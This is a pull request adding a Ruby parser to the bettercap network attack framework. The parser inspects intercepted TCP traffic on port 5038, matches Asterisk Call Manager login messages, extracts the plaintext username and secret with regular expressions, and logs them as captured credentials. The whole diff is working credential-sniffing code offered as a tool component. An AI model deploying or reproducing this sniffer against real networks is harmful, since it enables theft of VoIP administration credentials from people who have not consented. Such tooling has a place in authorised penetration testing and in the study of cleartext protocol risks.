### PR TITLE
Add sniffer/parsers/Asterisk

### DIFF
--- a/lib/bettercap/sniffer/parsers/asterisk.rb
+++ b/lib/bettercap/sniffer/parsers/asterisk.rb
@@ -1,0 +1,36 @@
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : https://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Parsers
+# Asterisk Call Manager authentication parser.
+class Asterisk  < Base
+  def initialize
+    @name = 'Asterisk'
+  end
+  def on_packet( pkt )
+    begin
+      if pkt.tcp_dst == 5038
+        if pkt.to_s =~ /action:\s+login\r?\n/i
+          if pkt.to_s =~ /username:\s+(.+?)\r?\n/i && pkt.to_s =~ /secret:\s+(.+?)\r?\n/i
+            user = pkt.to_s.scan(/username:\s+(.+?)\r?\n/i).flatten.first
+            pass = pkt.to_s.scan(/secret:\s+(.+?)\r?\n/i).flatten.first
+            StreamLogger.log_raw( pkt, @name, "username=#{user} password=#{pass}" )
+          end
+        end
+      end
+    rescue
+    end
+  end
+end
+end
+end


### PR DESCRIPTION
Sniff clear text authentication credentials from Asterisk Call Manager connections on port 5038/tcp.
